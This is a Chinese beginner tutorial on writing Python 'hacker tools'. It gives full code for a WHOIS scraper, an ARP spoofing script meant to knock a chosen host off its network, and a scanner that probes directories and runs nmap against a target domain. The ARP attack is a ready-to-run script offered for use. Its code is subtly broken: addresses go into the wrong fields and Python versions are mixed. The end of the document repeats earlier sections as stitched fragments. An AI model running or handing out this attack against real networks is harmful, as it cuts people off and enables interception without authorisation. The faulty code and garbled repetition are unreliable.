Python黑客工具入门教学文档<\/h1>

前言<\/h2>
本教学文档旨在为Python初学者提供三个基础网络安全工具的编写方法，包括WHOIS信息收集器、ARP断网攻击工具和目录信息收集工具。这些工具可以帮助新手理解Python在网络安全领域的应用。<\/p>

一、WHOIS信息收集器<\/h2>

功能概述<\/h3>

该工具用于收集指定域名的以下信息：<\/p>

IP信息<\/li>
子域名<\/li>
备案信息<\/li>
注册人信息<\/li>
邮箱<\/li>
地址<\/li>
电话<\/li>

DNS记录<\/li> <\/ul>

技术要点<\/h3>

使用requests<\/code>模块发送HTTP请求<\/li>
使用BeautifulSoup<\/code>解析HTML内容<\/li>

从ip138.com<\/code>网站抓取数据<\/li>
<\/ol>
代码实现<\/h3>
import<\/span> requests
<\/span><\/span>import<\/span> time
<\/span><\/span>from<\/span> bs4 import<\/span> BeautifulSoup
<\/span><\/span>
<\/span><\/span># 计时开始<\/span>
<\/span><\/span>start =<\/span> time.<\/span>time()
<\/span><\/span>
<\/span><\/span>def<\/span> chax<\/span>():
<\/span><\/span>    # 用户输入查询域名<\/span>
<\/span><\/span>    lid =<\/span> input('请输入你要查询的域名:'<\/span>)
<\/span><\/span>    
<\/span><\/span>    # 设置请求头<\/span>
<\/span><\/span>    head =<\/span> {
<\/span><\/span>        'User-Agent'<\/span>: 'Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/63.0.3239.132 Safari\/537.36'<\/span>
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    # 构造查询URL<\/span>
<\/span><\/span>    url =<\/span> "http:\/\/site.ip138.com\/<\/span>{}<\/span>\/"<\/span>.<\/span>format(lid)
<\/span><\/span>    urldomain =<\/span> "http:\/\/site.ip138.com\/<\/span>{}<\/span>\/domain.htm"<\/span>.<\/span>format(lid)
<\/span><\/span>    url2 =<\/span> "http:\/\/site.ip138.com\/<\/span>{}<\/span>\/beian.htm"<\/span>.<\/span>format(lid)
<\/span><\/span>    url3 =<\/span> "http:\/\/site.ip138.com\/<\/span>{}<\/span>\/whois.htm"<\/span>.<\/span>format(lid)
<\/span><\/span>    
<\/span><\/span>    # 发送请求<\/span>
<\/span><\/span>    rb =<\/span> requests.<\/span>get(url, headers=<\/span>head)
<\/span><\/span>    rb1 =<\/span> requests.<\/span>get(urldomain, headers=<\/span>head)
<\/span><\/span>    rb2 =<\/span> requests.<\/span>get(url2, headers=<\/span>head)
<\/span><\/span>    rb3 =<\/span> requests.<\/span>get(url3, headers=<\/span>head)
<\/span><\/span>    
<\/span><\/span>    # 解析IP解析记录<\/span>
<\/span><\/span>    gf =<\/span> BeautifulSoup(rb.<\/span>content, 'html.parser'<\/span>)
<\/span><\/span>    print('[+]IP解析记录'<\/span>)
<\/span><\/span>    for<\/span> x in<\/span> gf.<\/span>find_all('p'<\/span>):
<\/span><\/span>        link =<\/span> x.<\/span>get_text()
<\/span><\/span>        print(link)
<\/span><\/span>    
<\/span><\/span>    # 解析子域名<\/span>
<\/span><\/span>    gf1 =<\/span> BeautifulSoup(rb1.<\/span>content, 'html.parser'<\/span>)
<\/span><\/span>    print('[+]子域名查询'<\/span>)
<\/span><\/span>    for<\/span> v in<\/span> gf1.<\/span>find_all('p'<\/span>):
<\/span><\/span>        link2 =<\/span> v.<\/span>get_text()
<\/span><\/span>        print(link2)
<\/span><\/span>    
<\/span><\/span>    # 解析备案信息<\/span>
<\/span><\/span>    gf2 =<\/span> BeautifulSoup(rb2.<\/span>content, 'html.parser'<\/span>)
<\/span><\/span>    print('[+]备案查询'<\/span>)
<\/span><\/span>    for<\/span> s in<\/span> gf2.<\/span>find_all('p'<\/span>):
<\/span><\/span>        link3 =<\/span> s.<\/span>get_text()
<\/span><\/span>        print(link3)
<\/span><\/span>    
<\/span><\/span>    # 解析WHOIS信息<\/span>
<\/span><\/span>    gf3 =<\/span> BeautifulSoup(rb3.<\/span>content, 'html.parser'<\/span>)
<\/span><\/span>    print('[+]whois查询'<\/span>)
<\/span><\/span>    for<\/span> k in<\/span> gf3.<\/span>find_all('p'<\/span>):
<\/span><\/span>        link4 =<\/span> k.<\/span>get_text()
<\/span><\/span>        print(link4)
<\/span><\/span>
<\/span><\/span>chax()
<\/span><\/span>
<\/span><\/span># 计时结束<\/span>
<\/span><\/span>end =<\/span> time.<\/span>time()
<\/span><\/span>print('查询耗时:'<\/span>, end-<\/span>start)
<\/span><\/span><\/code><\/pre>使用说明<\/h3>

安装依赖：pip install requests beautifulsoup4<\/code><\/li>
运行脚本并输入要查询的域名<\/li>
程序将从ip138.com获取相关信息并显示<\/li>
<\/ol>
二、ARP断网攻击工具<\/h2>
攻击原理<\/h3>
ARP攻击通过伪造IP地址与MAC地址实现ARP欺骗，在网络中发送大量ARP通信量。攻击者持续发送ARP包可造成中间人攻击或断网攻击。<\/p>
技术要点<\/h3>

使用scapy<\/code>库构造和发送网络数据包<\/li>
获取目标MAC地址<\/li>
构造ARP响应包<\/li>
<\/ol>
代码实现<\/h3>
import<\/span> os
<\/span><\/span>import<\/span> sys
<\/span><\/span>from<\/span> scapy.layers.l2 import<\/span> getmacbyip
<\/span><\/span>from<\/span> scapy.all import<\/span> (Ether, ARP, sendp)
<\/span><\/span>
<\/span><\/span># 查看网络接口<\/span>
<\/span><\/span>ifconfig =<\/span> os.<\/span>system('ifconfig'<\/span>)
<\/span><\/span>print(ifconfig)
<\/span><\/span>
<\/span><\/span># 用户输入<\/span>
<\/span><\/span>gmac =<\/span> raw_input('Please enter gateway IP:'<\/span>)
<\/span><\/span>liusheng =<\/span> raw_input('Please enter your IP:'<\/span>)
<\/span><\/span>liusrc =<\/span> raw_input('Please enter target IP:'<\/span>)
<\/span><\/span>
<\/span><\/span>try<\/span>:
<\/span><\/span>    # 获取目标MAC地址<\/span>
<\/span><\/span>    tg =<\/span> getmacbyip(liusrc)
<\/span><\/span>    print(tg)
<\/span><\/span>except<\/span> Exception<\/span> as<\/span> f:
<\/span><\/span>    print('[-]<\/span>{}<\/span>'<\/span>.<\/span>format(f))
<\/span><\/span>    exit()
<\/span><\/span>
<\/span><\/span>def<\/span> arpspoof<\/span>():
<\/span><\/span>    try<\/span>:
<\/span><\/span>        # 构造以太网帧和ARP包<\/span>
<\/span><\/span>        eth =<\/span> Ether()
<\/span><\/span>        arp =<\/span> ARP(
<\/span><\/span>            op=<\/span>"is-at"<\/span>,  # ARP响应<\/span>
<\/span><\/span>            hwsrc=<\/span>gmac,  # 网关MAC<\/span>
<\/span><\/span>            psrc=<\/span>liusheng,  # 网关IP<\/span>
<\/span><\/span>            hwdst=<\/span>tg,  # 目标MAC<\/span>
<\/span><\/span>            pdst=<\/span>liusrc  # 目标IP<\/span>
<\/span><\/span>        )
<\/span><\/span>        
<\/span><\/span>        # 显示构造的包<\/span>
<\/span><\/span>        print((eth\/<\/span>arp).<\/span>show())
<\/span><\/span>        
<\/span><\/span>        # 发送ARP包<\/span>
<\/span><\/span>        sendp(eth\/<\/span>arp, inter=<\/span>2<\/span>, loop=<\/span>1<\/span>)
<\/span><\/span>    except<\/span> Exception<\/span> as<\/span> g:
<\/span><\/span>        print('[-]<\/span>{}<\/span>'<\/span>.<\/span>format(g))
<\/span><\/span>        exit()
<\/span><\/span>
<\/span><\/span>arpspoof()
<\/span><\/span><\/code><\/pre>使用说明<\/h3>

安装scapy：pip install scapy<\/code> (Python 2) 或 pip install scapy3<\/code> (Python 3)<\/li>
推荐在Linux系统(Kali, CentOS, Ubuntu)下运行<\/li>
运行时需要输入网关IP、本机IP和目标IP<\/li>
程序将不断发送ARP欺骗包<\/li>
<\/ol>
三、目录信息收集工具<\/h2>
功能概述<\/h3>
该工具用于收集目标网站的信息，包括：<\/p>

HTTP指纹<\/li>
robots.txt检查<\/li>
目录扫描<\/li>
端口扫描<\/li>
WHOIS查询<\/li>
IP反查域名<\/li>
<\/ul>
技术要点<\/h3>

使用requests<\/code>获取HTTP头部信息<\/li>
通过HTTP响应码判断资源存在性<\/li>
使用os<\/code>模块调用系统命令(nmap)<\/li>
使用socket<\/code>模块进行DNS查询<\/li>
<\/ol>
代码实现<\/h3>
import<\/span> requests
<\/span><\/span>import<\/span> os
<\/span><\/span>import<\/span> socket
<\/span><\/span>from<\/span> bs4 import<\/span> BeautifulSoup
<\/span><\/span>import<\/span> time
<\/span><\/span>
<\/span><\/span># 全局变量<\/span>
<\/span><\/span>lgr =<\/span> ""<\/span>
<\/span><\/span>
<\/span><\/span># 获取HTTP指纹<\/span>
<\/span><\/span>def<\/span> Webfingerprintcollection<\/span>():
<\/span><\/span>    global<\/span> lgr
<\/span><\/span>    lgr =<\/span> input('请输入目标域名:'<\/span>)
<\/span><\/span>    url =<\/span> "http:\/\/<\/span>{}<\/span>"<\/span>.<\/span>format(lgr)
<\/span><\/span>    header =<\/span> {
<\/span><\/span>        'User-Agent'<\/span>: 'Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/63.0.3239.132 Safari\/537.36'<\/span>
<\/span><\/span>    }
<\/span><\/span>    r =<\/span> requests.<\/span>get(url, headers=<\/span>header)
<\/span><\/span>    xyt =<\/span> r.<\/span>headers
<\/span><\/span>    for<\/span> key in<\/span> xyt:
<\/span><\/span>        print(key, ':'<\/span>, xyt[key])
<\/span><\/span>
<\/span><\/span>Webfingerprintcollection()
<\/span><\/span>print('='<\/span>*<\/span>50<\/span>)
<\/span><\/span>
<\/span><\/span># 检查robots.txt<\/span>
<\/span><\/span>def<\/span> robots<\/span>():
<\/span><\/span>    urlsd =<\/span> "http:\/\/<\/span>{}<\/span>\/robots.txt"<\/span>.<\/span>format(lgr)
<\/span><\/span>    header =<\/span> {
<\/span><\/span>        'User-Agent'<\/span>: 'Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/63.0.3239.132 Safari\/537.36'<\/span>
<\/span><\/span>    }
<\/span><\/span>    gf =<\/span> requests.<\/span>get(urlsd, headers=<\/span>header, timeout=<\/span>8<\/span>)
<\/span><\/span>    if<\/span> gf.<\/span>status_code ==<\/span> 200<\/span>:
<\/span><\/span>        print('robots.txt存在'<\/span>)
<\/span><\/span>        print('[+]该站存在robots.txt'<\/span>, urlsd)
<\/span><\/span>    else<\/span>:
<\/span><\/span>        print('[-]没有robots.txt'<\/span>)
<\/span><\/span>
<\/span><\/span>robots()
<\/span><\/span>print("="<\/span>*<\/span>50<\/span>)
<\/span><\/span>
<\/span><\/span># 目录扫描<\/span>
<\/span><\/span>def<\/span> Webdirectoryscanner<\/span>():
<\/span><\/span>    dict =<\/span> open('build.txt'<\/span>, 'r'<\/span>, encoding=<\/span>'utf-8'<\/span>).<\/span>read().<\/span>split('<\/span>\n<\/span>'<\/span>)
<\/span><\/span>    for<\/span> xyt in<\/span> dict:
<\/span><\/span>        try<\/span>:
<\/span><\/span>            header =<\/span> {
<\/span><\/span>                'User-Agent'<\/span>: 'Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/63.0.3239.132 Safari\/537.36'<\/span>
<\/span><\/span>            }
<\/span><\/span>            urljc =<\/span> "http:\/\/"<\/span> +<\/span> lgr +<\/span> "<\/span>{}<\/span>"<\/span>.<\/span>format(xyt)
<\/span><\/span>            rvc =<\/span> requests.<\/span>get(urljc, headers=<\/span>header, timeout=<\/span>8<\/span>)
<\/span><\/span>            if<\/span> rvc.<\/span>status_code ==<\/span> 200<\/span>:
<\/span><\/span>                print('[*]'<\/span>, urljc)
<\/span><\/span>        except<\/span>:
<\/span><\/span>            print('[-]远程主机强迫关闭了一个现有的连接'<\/span>)
<\/span><\/span>
<\/span><\/span>Webdirectoryscanner()
<\/span><\/span>print("="<\/span>*<\/span>50<\/span>)
<\/span><\/span>
<\/span><\/span># 获取IP地址<\/span>
<\/span><\/span>s =<\/span> socket.<\/span>gethostbyname(lgr)
<\/span><\/span>
<\/span><\/span># 端口扫描<\/span>
<\/span><\/span>def<\/span> portscanner<\/span>():
<\/span><\/span>    o =<\/span> os.<\/span>system('nmap <\/span>{}<\/span> program'<\/span>.<\/span>format(s))
<\/span><\/span>    print(o)
<\/span><\/span>
<\/span><\/span>portscanner()
<\/span><\/span>print('='<\/span>*<\/span>50<\/span>)
<\/span><\/span>
<\/span><\/span># WHOIS查询<\/span>
<\/span><\/span>def<\/span> whois<\/span>():
<\/span><\/span>    heads =<\/span> {
<\/span><\/span>        'User-Agent'<\/span>: 'Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/63.0.3239.132 Safari\/537.36'<\/span>
<\/span><\/span>    }
<\/span><\/span>    urlwhois =<\/span> "http:\/\/site.ip138.com\/<\/span>{}<\/span>\/whois.htm"<\/span>.<\/span>format(lgr)
<\/span><\/span>    rvt =<\/span> requests.<\/span>get(urlwhois, headers=<\/span>heads)
<\/span><\/span>    bv =<\/span> BeautifulSoup(rvt.<\/span>content, "html.parser"<\/span>)
<\/span><\/span>    for<\/span> line in<\/span> bv.<\/span>find_all('p'<\/span>):
<\/span><\/span>        link =<\/span> line.<\/span>get_text()
<\/span><\/span>        print(link)
<\/span><\/span>
<\/span><\/span>whois()
<\/span><\/span>print('='<\/span>*<\/span>50<\/span>)
<\/span><\/span>
<\/span><\/span># IP反查域名<\/span>
<\/span><\/span>def<\/span> IPbackupdomainname<\/span>():
<\/span><\/span>    wu =<\/span> socket.<\/span>gethostbyname(lgr)
<\/span><\/span>    rks =<\/span> "http:\/\/site.ip138.com\/<\/span>{}<\/span>\/"<\/span>.<\/span>format(wu)
<\/span><\/span>    rod =<\/span> {
<\/span><\/span>        'User-Agent'<\/span>: 'Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/63.0.3239.132 Safari\/537.36'<\/span>
<\/span><\/span>    }
<\/span><\/span>    sjk =<\/span> requests.<\/span>get(rks, headers=<\/span>rod)
<\/span><\/span>    liverou =<\/span> BeautifulSoup(sjk.<\/span>content, 'html.parser'<\/span>)
<\/span><\/span>    for<\/span> low in<\/span> liverou.<\/span>find_all('li'<\/span>):
<\/span><\/span>        bc =<\/span> low.<\/span>get_text()
<\/span><\/span>        print(bc)
<\/span><\/span>
<\/span><\/span>IPbackupdomainname()
<\/span><\/span>print('='<\/span>*<\/span>50<\/span>)
<\/span><\/span><\/code><\/pre>使用说明<\/h3>

安装依赖：pip install requests beautifulsoup4<\/code><\/li>
准备一个目录字典文件build.txt<\/code><\/li>
确保系统已安装nmap<\/li>
运行脚本并输入目标域名<\/li>
程序将依次执行各项信息收集功能<\/li>
<\/ol>
注意事项<\/h2>

这些工具仅用于教育目的，未经授权对他人系统进行扫描或攻击是违法行为<\/li>
ARP攻击会干扰网络通信，请在实验环境中使用<\/li>
频繁扫描他人网站可能触发安全机制或被封禁IP<\/li>
使用这些工具前请确保已获得必要的授权<\/li>
<\/ol>
扩展学习<\/h2>

深入学习Python网络编程<\/li>
了解网络安全基础知识<\/li>
研究更高级的信息收集技术<\/li>
学习如何防御ARP欺骗攻击<\/li>
探索其他网络安全工具的开发<\/li>
<\/ol>
通过这三个工具的实践，初学者可以掌握Python在网络安全领域的基本应用，为进一步学习打下坚实基础。<\/p>

Python黑客工具入门教学文档<\/h1>

前言<\/h2> 本教学文档旨在为Python初学者提供三个基础网络安全工具的编写方法，包括WHOIS信息收集器、ARP断网攻击工具和目录信息收集工具。这些工具可以帮助新手理解Python在网络安全领域的应用。<\/p>

一、WHOIS信息收集器<\/h2>

二、ARP断网攻击工具<\/h2>

攻击原理<\/h3> ARP攻击通过伪造IP地址与MAC地址实现ARP欺骗，在网络中发送大量ARP通信量。攻击者持续发送ARP包可造成中间人攻击或断网攻击。<\/p>

三、目录信息收集工具<\/h2>

前言<\/h2>
本教学文档旨在为Python初学者提供三个基础网络安全工具的编写方法，包括WHOIS信息收集器、ARP断网攻击工具和目录信息收集工具。这些工具可以帮助新手理解Python在网络安全领域的应用。<\/p>

攻击原理<\/h3>
ARP攻击通过伪造IP地址与MAC地址实现ARP欺骗，在网络中发送大量ARP通信量。攻击者持续发送ARP包可造成中间人攻击或断网攻击。<\/p>